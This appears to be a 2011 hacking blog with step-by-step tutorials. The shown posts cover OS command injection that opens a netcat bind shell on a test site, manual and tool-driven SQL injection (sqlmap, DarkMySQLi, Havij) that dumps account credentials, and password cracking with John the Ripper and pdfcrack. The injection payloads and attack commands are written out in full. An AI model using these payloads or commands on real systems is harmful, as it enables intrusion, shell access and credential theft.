Sunday, July 24, 2011

OS Command Injection- From Web App To System

Hello, and welcome to my OS Command Injection guide. We will be talking about how this vulnerability occurs, and also what we can do after successfully exploiting this vulnerability. OS Command Injection (also called OS Command Execution) occurs when an attacker tries to execute system-level commands through a vulnerable application. For this guide, the target will be this site-

http://www.webscantest.com/


And the vulnerable application is located here-

http://www.webscantest.com/osrun/whois.php


As you can see, the vulnerable application is a whois script for domain lookups. But what is vulnerable about it?  Let's take a look.

So pretty much, in a nutshell, this is what the web server will look like-

        *Vulnerable Application*
             ***Web Site***
        *********Server*********
*********Operating System***********


Yes, I am very aware this is a shitty illustration. Let me make it more simple-

 *********whois.php************
 ****www.webscantest.com****
************Apache**************
*************Linux**********


So pretty much, when OS Command Injection is occurring, the data we use for the vulnerable application is being passed all the way down to the operating system. This means that we can execute Linux commands on the machine that is hosting the web site.

So what could we do, then? Well, first navigate to the site. You should see something like this-












Looking at this page, we can see that there is a field for text, and a button to submit the text we enter and then retrieve the results. But how can we test this application for OS command injection? First, let's find out what kind of operating system the remote host is running.  Just go to a Terminal and fire up nmap-


nmap -O www.webscantest.com

You should get some output like this-
















So, judging by our output, we can safely assume that the remote host (www.webscantest.com) is running Linux. Feel free to fire up xprobe for a second opinion. And while we're at it, let's find out what kind of server they're running-

netcat -vv www.webscantest.com 80


Once you have an open connection to the server, type-

GET / HTTP/1.0

After you type the above, hit the Return key (Enter) twice. You should get this as output-


















Judging by the output, we know the target is running an Apache server powered by PHP 5.3.5.

So you want to inject commands, eh? Well, since we know that the target host is running Linux, you should definitely brush up on your knowledge of the Linux command line. But now we need some sort of intercepting proxy. This would include burpsuite, web scarab, or my favorite, ZAP.

ZAP stands for Zed Attack Proxy, a tool created by OWASP. It is able to spider web pages, perform active scans, brute force, perform port scans, and fuzz web pages. But most importantly, it let's us modify HTTP requests on the fly, which will allow us to determine if the web application is vulnerable to OS Command Injection. You can download ZAP here-

https://www.owasp.org/index.php/OWASP_Zed_Attack_Proxy_Project

Make sure you configure ZAP to be your proxy. By default, ZAP's local proxy configuration is set to localhost:8080. To see ZAP's proxy configuration, go to Tools-->Options-->Local Proxy.

You also have to set your browser to use the same Manual Proxy Settings that ZAP is using. For me, since I am using Firefox, I go to Edit-->Preferences-->Advanced-->Network-->Settings. From there you can use your Manual Proxy Configuration and set the host and port to localhost:8080. Then click the little green arrow pointing to the right in the ZAP window. This will set a breakpoint on a requests we send, so we can modify them before they are executed and we get a response.

Now go back to the web page, and just click the "Lookup" button. You will see that your browser is busy with something. This is because we have the breakpoint set in ZAP. The request will not be executed until we forward it to the server.


Open up your ZAP window, and you should see the request we  are trying to make. In the first window, we see the request (POST). In the window right under it, we see a parameter called "domain=". It has no value, because we never entered anything into the text box in the web page when we clicked the "Lookup" button, remember? Well, let's modify that parameter by assigning a value to it-

domain=;ls


Since we know the target is running Linux, we will use Linux command line syntax (;ls) to see if there are any files in the current directory we can view. Now click the little blue play-looking button to forward the request to the server. Now you can see that there are some files embedded in the web page. The application is vulnerable to OS Command Injection!


You are probably thinking to yourself, "Wow, its vulnerable, but this is kinda lame". Well, how lame would it be if we had a shell on the server? Hmm? Your not such a smart ass now, are you? :)

What we are going to do is set up a reverse netcat shell. Since we can execute commands on the server, we can "plant" a listener on the server (since all of our commands are being directly passed to the operating system), and then connect to it. Sounds cool, huh? To do this, we do what we did before- Go to the web page, make sure there is a break point in ZAP, and then click the "Lookup" button without inputting anything. Then we capture the "domain=" parameter. What you want to do is make it look like this-

domain=;netcat -v -e '/bin/bash' -l -p 31337















The -v switch is for verbosity
The -e switch is to run a program when a connection is made (in this case, a bash shell).
The -l switch is to listen for a connection
The -p switch is to assign a port to listen on (in this case, 31337).

Then click the red arrow you are using for a break point so that it turns green again, and then forward the request. The browser stays busy, because it's waiting for a connection from you. :)

Type in-

netcat -vv www.webscantest.com 31337

Here is the output-
















Congratulations! You have a shell!

Happy Hacking!  :)

Saturday, June 25, 2011

MySQL 5.0 --> Should've Used Is_Numeric()

Hello, and welcome to my guide on manual SQL Injection against MySQL 5.0 servers. This will cover basic injection, all the way from finding a vulnerable target to dumping rows of data from a database. You will also use a couple of SQL requests and functions, and actually get a grasp of what a table looks like. Furthermore, every hacker should be able to exploit these vulnerabilities manually, whether it be incorrect type handling or incorrectly filtered escape characters (these types of vulnerabilities are generally what opens the door for injection).


When injection occurs, rows of data are dumped from a column, which is grouped with a bunch of other columns inside a table, which is grouped with a bunch of other tables inside a database, which is grouped with a bunch of other databases inside a server. Whoa! That probably sounded like a bunch of bullshit, huh? Well, you should have a basic understanding by the end of the tutorial. Have you ever seen a spreadsheet? Think of that as a table. Think of a bunch of those as a database.

Firstly, you should make sure you have the prerequisites, just like any other guide I have written. Fortunately for you, all you need is an Internet connection and a web browser. I don't care if you run Linux, Windows, or Mac (eeeewwwww).

Like most of the guides about web application penetration testing, we are going to use the following target-

http://www.webscantest.com/

Just for the hell of it, I'm going to use Linux for this tutorial, just because I feel like it. :D

Now then, the vulnerable page is here-

http://webscantest.com/datastore/search_get_by_id.php?id=4

When you navigate to it, you should see this-













Looks like a normal page, right? Let's test for vulnerability by adding a ' (apostrophe) to the end of the url-

http://webscantest.com/datastore/search_get_by_id.php?id=4'

Here is the output-













Hmm. Looks like we have an SQL error. Now let's think to ourselves for a minute. The error clearly states we have an error in our SQL syntax. If we weren't able to make actual queries to the database, why would we be told to use proper syntax in the first place? This is how we confirm vulnerability, at least to some extent. But what is happening when we add the apostrophe to the end of the URL? Well, in the first screenshot, the id parameter returned a value of 4. When we added an apostrophe, we were assigning a non-numeric value to the id parameter. This means that the parameter is not checking for numeric values. If we can return more than just a number, why not return tables and columns?

Well, let's find our column count. To do this, we will use order by. We will increment by 1 until we get an error.

First type-

http://webscantest.com/datastore/search_get_by_id.php?id=4 order by 1--


No error, right? Let's speed it up now. Instead of incrementing by 1, let's go to 5-


http://webscantest.com/datastore/search_get_by_id.php?id=4 order by 5--

Whoops. We got another syntax error. Well, since we know the column count is less than 5 but greater than 1 (because we didn't get an error on one), let's increment backwards by 1-

http://webscantest.com/datastore/search_get_by_id.php?id=4 order by 4--

Alright, no error. Since we got an error on 5 but not on 4, the column count is 4.

Now we're going to use the union method. This will help us enumerate the database, and also find injectable columns we can use-

http://webscantest.com/datastore/search_get_by_id.php?id=4 union all select 1,2,3,4--

Here is the output-












 All of a sudden we see another little addition to the web page. We see a 1,2, and 3 that weren't there before. Now we have columns to inject. Lets enumerate!

Let's find the version of the database. The column I'm going to inject inside of is 2-

http://webscantest.com/datastore/search_get_by_id.php?id=4 union all select 1,version(),3,4--

Here is my output-












Now, instead of a 2, we see the version of the database. Let's find the name of the database-

http://webscantest.com/datastore/search_get_by_id.php?id=4 union all select 1,database(),3,4--



Instead of a database version, we see the actual name of the database, which is scanme. What about the database user?

http://webscantest.com/datastore/search_get_by_id.php?id=4 union all select 1,user(),3,4--

We now know that the user for the scanme database is scanme@localhost. This kind of information can be useful for further penetration testing of the target. But now we want all of the tables from the database. Since the database version is <= 5.0, we can use information_schema. Information_schema is pretty much the information database, which stores information about all the other databases maintained by the MySQL server. Let's try it-

http://webscantest.com/datastore/search_get_by_id.php?id=4 union all select 1,table_name,3,4 from information_schema.tables--

Here is the output-












Most of the tables we see appear are for the information_schema database. But we see two that look out of the ordinary in comparison to the others when we scroll to the bottom of the page, as seen in the output- accounts and inventory. We are going to want to dump the columns from the accounts table, because why do we care what they have in stock?

To do this, we need to convert the table name accounts to ascii. You can go online and find a converter, or use a built-in encoder in a tool like WebSlayer. We are going to use the char() function, with the ascii values of each character of the "accounts" table name as the function's parameter. This is how we do it-

http://webscantest.com/datastore/search_get_by_id.php?id=4 union all select 1,column_name,3,4 from information_schema.columns where table_name= char(97,99,99,111,117,110,116,115)


Here is the output-

 










From these columns we are going to dump the data from the uname and passwd columns. Let's do it-

http://webscantest.com/datastore/search_get_by_id.php?id=4 union all select 1,concat(uname,0x3a,passwd),3,4 from accounts--

This MySQL query will give us output like so-














We now have the usernames and passwords stored in the database. These are usually displayed in order of the query we provide, which would be uname:passwd. We have the passwords, true, but they are hashed. Lets crack em!





















As we can see from our lcrack output, the username is admin and the password is admin.

Thus we have successfully exploited the MySQL server.

Happy Hacking!

Sunday, June 19, 2011

John The Ripper- Destroying Passwords The Penguin Way

Hello, and welcome to my guide on using John The Ripper. Today we will be cracking our own Linux password. Now before you get all jumpy and excited about what you are going to learn, let me just say this- THE CAPABILITIES OF ANY PASSWORD CRACKING TOOL ARE ONLY AS GOOD AS YOUR WORDLIST. In other words, if you have a wordlist with 5 words in it, don't expect to crack anything. It would be like trying to drive a car without a motor. If you have no idea what a wordlist is, then I'll tell you- a wordlist, or a dictionary file, is merely a .txt or .lst (these are usually the file formats) file with a bunch of words in it. On every line of the file there is only one word. Then on the next line, there is another word. Parsing these kinds of files is easy- any high level programming/scripting language can usually due this by using the .readline() method or something similar, then replacing the line that was just read with a .replace() method, or something similar.

Here are some things you will probably need or want to have for this guide-

--> BackTrack 5 (or another Linux distro, preferably Ubuntu/Xubuntu/Kubuntu)
--> John The Ripper
--> Some way to generate a hash (online hash generator, WebSlayer, or something of the sort.)

I highly recommend using BackTrack 5. If for some reason you can't use it or just don't like it, take a look at Blackbuntu.

The first thing we're going to do is crack our own Linux password. If you are using BackTrack 5, and you haven't changed your password, the password is toor (we are using the root account). Let's get started!


To use see all the available options to use with John The Ripper, simply type john in your Terminal. Read through all the options. This is the best way to learn how penetration testing tools work, and most of the time you will learn something important from learning how to use even one kind of switch or parameter. doing a couple things with this tool, including cracking Linux passwords and a couple other hash types.

Since we're cracking our own Linux password, we have to change directories to our /etc/ directory. In this directory, we can take a look at our passwd file. To do this, we can use any text editor we want. I'm just going to use cat. Here's what you should see-

















If you have no idea how to read through this format, let me teach you. Let's just take the line from the root account and look at it-

root:x:0:0:root:/root:/bin/bash

If it looks a little confusing, don't worry, because once you understand it you can breeze right through through the whole passwd file. So lets break it down-

root --> This is the username field.

x --> This is the password field.

0 --> The User ID (UID) field.

0 --> The Group ID field.

root --> The User ID Information field. This field is used for comments and whatnot.

/root --> The Home Directory for the user.

/bin/bash --> This is the absolute path for a command shell. It doesn't have to be a command shell, but it usually is.


So now, after looking at the above explanation, your wondering why the password field has an x. This is because the password is shadowed. This is done by the implementation of the /etc/shadow file. The shadow file holds the actual encrypted password, but no regular user is allowed to see it. If we had access to it (which we do, if you are using BackTrack), we wouldn't need to use the /etc/passwd file. But the whole point of this guide is to teach some small part of privilege escalation, so we have to pretend we aren't root yet. But if we don't have access to the /etc/shadow file, and the password field of the /etc/passwd file holds just an x, then how do we get the encrypted password? We have to unshadow the password field. Then we will see the same hash in the passwd file that is stored in the shadow file. To unshadow the password field, we will use the unshadow utility implemented in John The Ripper. To do this, navigate to the directory you have John The Ripper installed, then type-

./unshadow /etc/passwd /etc/shadow


Here is the output-

















As you can see, we now have the encrypted password. The only thing left to do is crack this password with John The Ripper.

What we're going to do is pass the username and encrypted password into a text file. This text file needs to be in the same directory as John The Ripper. So copy the first two fields of the root account, and put them in a text file. This is what it should look like-
















I will save the file as crackme.txt

Now that we have our file ready, let's crack the hash!

There are two methods of cracking this hash. Firstly, we will use our wordlist. We talked about these, remember? John The Ripper has it's own wordlist, called password.lst, so don't worry if you think you don't have one. The other method will be by using a bruteforce attack (--incremental). First, the dictionary attack-

./john --wordlist=password.lst crackme.txt

Here's the output-
















As you can see, John The Ripper detected what type of hash we were cracking, and returned the plain text of the username and password. Cool! Now let's try to bruteforce the password. This can be done with the --single option-

./john --single crackme.txt

Here's the output-
















If we want, we can specify the --incremental option, which is just like the --single option, except we can define what kind of mode we want to use, which determines what kind of character set we are using.

TROUBLESHOOTING-

Q- I get the following error- "No password hashes loaded".

A- This is probably due to the fact that John The Ripper has already cracked the hash you are trying to crack. If you want to crack the same hash again, delete the john.pot file.



Q- John The Ripper didn't crack my password. What the hell?

A- WHY DID YOU PICK SUCH A STRONG PASSWORD?! Just kidding, good job on taking your security seriously. There are two solutions to this problem- either put your password in the wordlist (password.lst), or change your password to something stupid (just for this guide). If you choose the latter, make sure you change your password back to what it was.

HAPPY HACKING!

Saturday, June 11, 2011

DarkMySQLi - A MySQL Injection Script For Penetration Testers

Hello, and welcome to my guide on basic usage of DarkMySQLi, a great tool for injecting MySQL databases. This guide will go from detecting a vulnerable MySQL database server to successful exploitation of the actual database with this tool. As always, we will be using the ever-so-vulnerable test website-

http://www.webscantest.com/

Requirements for this guide are-

-->BackTrack 5
-->DarkMySQLi
-->An Internet connection

The actual URL we will be navigating to is-

http://www.webscantest.com/datastore/search_get_by_id.php?id=4

From this URL we can see the the id parameter returns an integer value of 4.

Here's what the web page looks like-

















If you want to check for vulnerability, then just add an apostrophe to the end of the URL, like so-


http://www.webscantest.com/datastore/search_get_by_id.php?id=4'


This is what the page will look like once you execute this request-














From this error, we can see that we are using incorrect syntax for the query we are sending to the database. We also know from this error that the remote database server is MySQL. Now we can fire up DarkMySQLi and attack the database.


First we need to find the number of columns in the database. To do this, we will use this command-

python DarkMySQLi.py -u http://www.webscantest.com/datastore/search_get_by_id.php?id=4 --findcol


Here is the output for the above command-
















From the output we can see that the column length is 4. But we also see two URL's- the actual URL used to enumerate the column length, and a URL generated by DarkMySQLi. The DarkMySQLi URL is the URL we will use for this tool. If you want to browse to the real URL, hold down Ctrl and click the real URL inside your Terminal window (not the DarkMySQLi URL).

Now we want to find all the tables of the database. We can do this easily with the --full option, which will help us enumerate everything we can. To do this, type-

python ./DarkMySQLi.py -u http://www.webscantest.com/datastore/search_get_by_id.php?id=4+AND+1=2+UNION+SELECT+darkc0de,darkc0de,darkc0de,darkc0de-- --full


This command will enumerate everything possible. This switch (--full) only works for MySQL v5.0 and above. :)

Here is the output-















Now we have the name of the database, the names of all the tables in the database, and the names of all the columns for each table. I am going to
gather all the data from the accounts table with the following command-

python ./DarkMySQLi.py -u http://www.webscantest.com/datastore/search_get_by_id.php?id=4+AND+1=2+UNION+SELECT+darkc0de,darkc0de,darkc0de,darkc0de-- -D scanme -T accounts -C id,uname,passwd,fname,lname --dump

It's a rather long command, but it will extract all data from the database. Here is the output-















From the output shown above, we have successfully extracted all data from the database. It takes a couple seconds, but you should be able to read the output just fine.

Now think about the order of the command you used. If we listed id,uname,passwd,fname, and lname (in that order), then the output will be in the same order. This means that if the first row of data looks like this-

1:admin:21232f297a57a5a743894a0e4a801fc3


then the id is 1, the uname is admin, and the passwd is 21232f297a57a5a743894a0e4a801fc3. Looks like an MD5 hash. Let's save it to a text file and crack it with lcrack-
















From the output of lcrack, the username is admin (duh) and the password is admin. Navigate to-

http://www.webscantest.com/login.php

and log in with the username admin and the password admin. Happy Hacking! :)


(To download lcrack, type in apt-get install lcrack)

Friday, June 10, 2011

Sqlmap- SQL Injection for Penguins

Hello, and welcome to my guide to basic usage of sqlmap. For this guide, I will be using BackTrack 5 as my Linux distribution, but you can compile the tool yourself in another Linux distribution or in Windows with Cygwin. You can download it here-

http://sqlmap.sourceforge.net/


For this tutorial, our target will be-

http://www.webscantest.com/datastore/search_get_by_name.php?name=Rake


Now then, let's fire up sqlmap and get started.


First of all, the web page you are viewing should look like this-
















If you are not seeing the above web page, check the URL you entered and make sure you are connected to the Internet. At this point, we know that the Get parameter "name" is returning a value of Rake. We will us an apostrophe as a test for an SQL vulnerability in the database server. Now our URL should look like this-

http://www.webscantest.com/datastore/search_get_by_name.php?name=Rake'

Reload the web page, and view the output, which should look like this-















From the above output of the web page, we can assume poorly written SQL code was written for a MySQL database server, and that it is indeed vulnerable.

At this point we can attack the database server using sqlmap. So fire up sqlmap in your terminal and type-


./sqlmap.py -u http://www.webscantest.com/datastore/search_get_by_name.php?name=Rake


Your output for this command will look like this-

















From the output of sqlmap, we know that it is possible to inject SQL queries using sqlmap. Now we need to find all the databases. To do this, type-

./sqlmap.py -u http://www.webscantest.com/datastore/search_get_by_name.php?name=Rake --dbs

This command will enumerate all databases in the MySQL server. This should be your output-















From this output, we can see two databases-

scanme
information_schema

 

Now we will enumerate all the tables within the scanme database. To do this, type-

./sqlmap.py -u http://www.webscantest.com/datastore/search_get_by_name.php?name=Rake -D scanme --tables

Here is the output-
















This may be me, but I am willing to bet that user credentials are going to be found in the accounts table. Let's find out-

./sqlmap.py -u http://www.webscantest.com/datastore/search_get_by_name.php?name=Rake -D scanme -T accounts --columns

 

And here's the output-

















From this output we can see that there are 5 columns-

fname
id
lname
passwd
uname

 

Now we can dump all the rows of data from whatever columns we want. Let's dump all of it, shall we?

./sqlmap.py -u http://www.webscantest.com/datastore/search_get_by_name.php?name=Rake -D scanme -T accounts --dump


Here is the output-
















Hmm. Our output tells us that sqlmap recognized some hash values, more likely than not from the passwd column. At least security for the MySQL server isn't totally worthless.... Oh well. Let's use sqlmap's built in password cracking utility that can crack the hashes by collision, such as hash values implementing the MD5 algorithm. So as an answer to sqlmap's question, type Y select the default wordlist for the password utility by hitting Enter, and enter N (we don't yet need any password suffixes)-
















From the output, the hash values have been cracked, and we have privileges for all users, including admin. Now browse to-

http://www.webscantest.com/login.php



From here you can login as admin. Happy hacking!

Monday, June 6, 2011

Havij- SQL Injection For Script Kiddies

Today I am going to be talking about a very awesome SQL injection tool, Havij. I will be honest, this tool is insanely script kiddie, as in the only thing I have to worry about is whether my index finger hurts from clicking a few times. But seriously, this tool is no joke. Besides being able to extract data from MySQL databases with ease, it will also find administrator login pages, crack MD5 hashes, and even give you a command shell on Microsoft SQL Databases. It has Error Base, Time Based, and Blind database settings, and uses GET and POST methods with Integer and String injection. It's very useful for penetration testing, and even if it doesn't actually do the work for you, well, you can do it manually, right?

So, to follow this tutorial, you will need a Windows machine, Havij (duh), and access to the Internet. Do you have all of that? Good. Let the hacking begin!

So fire up Havij. You should see something like this (click on the image to enlarge)-


























Looks pretty script kiddie, doesn't it? Now for our target URL. I am going to be using a great site for web app pentesting, which you can find here-


http://www.webscantest.com/

The vulnerable page we will be using is here-


http://webscantest.com/datastore/search_get_by_id.php?id=3

Copy the above URL and paste it into the Target field of Havij. Now click Analyze. You will see something like this-

























In the bottom scroll box of Havij, you can see the Injection Type, the database server version, the current database, and whether the target is vulnerable or not (in this case, it is). =)

 
Now click on the Tables button. You will see this-

























Now click on the Get DB's button. In the left list box, you should see another database appear, called information_schema. You do not need to toggle this database unless you want to, because more likely than not, all the important tables, columns, and rows of data are in the scanme database.

Now you will need to click the Get Tables button (make sure you have the scanme database checked off). You will then get some output like this-



























Now, as you can see in the left list box, we have extracted two tables from the scanme database- inventory and accounts. I don't care what they're selling, I just want privileges! So check off the accounts table (you can also check off the inventory table if you want to).

Now we want to extract columns from our table. After you have checked off the accounts table, click Get Columns. You will then see this-


























Cool! We can see 5 columns we extracted from the accounts table. The names of these are-

--> lname
--> fname
--> passwd
--> uname
--> id


From this point on, we can now extract the data from all of these columns. Check off the ones you want to extract data from (I will just check them all off), and now we can get some account credentials!

























As you can see, we have administrator credentials. But wait! An MD5 hash! Well, there is an MD5 cracking utility built into Havij.....

Yeah, lets use it. You see, the MD5 cracker in Havij is not actually implemented into Havij. Havij simply passes the MD5 hash to a bunch of different online MD5 crackers. The way to do this is simple- scroll your mouse over the MD5 hash you see in the output of the data dump we did from the passwd column (we are cracking the admin hash), and double click. The hash should be highlighted, so right-click and copy it (Ctrl-C). Then click on the MD5 button. Simply paste the hash you copied earlier into the MD5 hash text box, and click Start. Havij will then pass our MD5 hash to a bunch of MD5 cracking websites. When all is said and done, you will see this-
























According to the output, the plain text of our MD5 hash is admin. Now navigate to the login page of our vulnerable site-


http://www.webscantest.com/login.php

In the Login: field, we will use our uname, which is admin. And for the Password: field, we will use our password, which is admin.

Happy Hacking!

Sunday, May 29, 2011

.PDF Password Cracking

In my honest opinion, I rarely come across password-protected .pdf files. Most .pdf files I have ever read don't really have anything in them that would be worth password-protection anyway. Still, to me it represents the concept of good security and privacy, both of which should be important to anybody using a computer. However, where you can make it, you can somehow break it. So fire up a Terminal (or a Shell Konsole) and let me show you how.

First of all, we need a .pdf file. Download any .pdf file online, or make a file and save it in a .pdf format. Let me just say you should be using a Linux distribution, preferably BackTrack 5. If you do not have Linux, go make friends with Google and do some research on it. Now then, the tool we will be using to password-protect the file is pdftk, and the tool to crack the password is called pdfcrack. It's a nifty little tool that cracks both user and owner passwords applied to .pdf files. To download the tools, make sure you are root (unless you are using BackTrack, in which case you already are), and type in-

apt-get install pdftk

Then-

apt-get install pdfcrack


Once you have both tools installed, we need to password protect our file. Go to your terminal and type-

pdftk unprotected_file.pdf output protected_file.pdf user_pw PROMPT

-where "unprotected_file.pdf" is your original .pdf file that you want to protect with a password, and "protected_file" is the new file that will be password protected (you can name this file anything you want). You will then be asked for a password as input, which will be the password that is used to protect your new .pdf file. I suggest using password as your password, just as a proof of concept for the tool, and also to test it (You can benchmark to do this, but where is the fun in that?). Once you enter it and hit your Return key (your Enter key), you now have two .pdf files- the original one without a password, and the new one that you created with pdftk.

Now you are ready to crack your password-protected .pdf file. Just go to your Terminal and type-


pdfcrack


After you type in this command, you will see plenty of options-


root@bt:~# pdfcrack
Usage: pdfcrack -f filename [OPTIONS]
OPTIONS:
-b, --bench perform benchmark and exit
-c, --charset=STRING Use the characters in STRING as charset
-w, --wordlist=FILE Use FILE as source of passwords to try
-n, --minpw=INTEGER Skip trying passwords shorter than this
-m, --maxpw=INTEGER Stop when reaching this passwordlength
-l, --loadState=FILE Continue from the state saved in FILENAME
-o, --owner Work with the ownerpassword
-u, --user Work with the userpassword (default)
-p, --password=STRING Give userpassword to speed up breaking
ownerpassword (implies -o)
-q, --quiet Run quietly
-s, --permutate Try permutating the passwords (currently only
supports switching first character to uppercase)
-v, --version Print version and exit


For this guide, I will show you two methods of cracking- a Dictionary Attack, and a Bruteforce Attack. The first method we will use is a dictionary attack. This will read every line of a wordlist until a match to the .pdf file's password is found. I specified above that you should have used password as your password for your .pdf file. Make sure you are in the same directory as your password-protected .pdf file, then type this in your Terminal-

pdfcrack -f [password-protected pdf file] --wordlist=[path to wordlist]

I named my .pdf file "crackme.pdf", so in BackTrack 5 my command would look like this-

pdfcrack -f crackme.pdf --wordlist=/pentest/passwords/wordlists/darkc0de.lst

Here is the output from my command-

root@bt:~/Hacking/Tutorials# pdfcrack -f crackme.pdf --wordlist=/pentest/passwords/wordlists/darkc0de.lst
PDF version 1.3
Security Handler: Standard
V: 2
R: 3
P: -3904
Length: 128
Encrypted Metadata: True
FileID: b1de5d9d3ca2f5ec1dc4514f2a583907
U: 1f10ccc1e8a59d7083f9bbc1acf9c70900000000000000000000000000000000
O: 43710afb9adf32376fad13575c2ae401b12dd0cd7b6cde9fca684132393c6604
Average Speed: 14601.4 w/s. Current Word: 'J Arthur Moore'
Average Speed: 14024.8 w/s. Current Word: 'avvizzimento'
Average Speed: 13901.1 w/s. Current Word: 'ferebamque'
Average Speed: 14160.5 w/s. Current Word: 'mescoleremo'
found user-password: 'password'

As you can see, pdfcrack cracked the password, specified by this line of output-

found user-password: 'password'

Yes, password was the password I chose.


The command for brute-forcing, however, will look like this-

pdfcrack -f crackme.pdf --charset=abcdefghijklmnopqrstuvwxyz -n 6

The output for this command will be similar to the Dictionary Attack output. However, this method will take longer, because it has to use the character set (charset) we specified to find the password, instead of using a dictionary file.

HAPPY HACKING!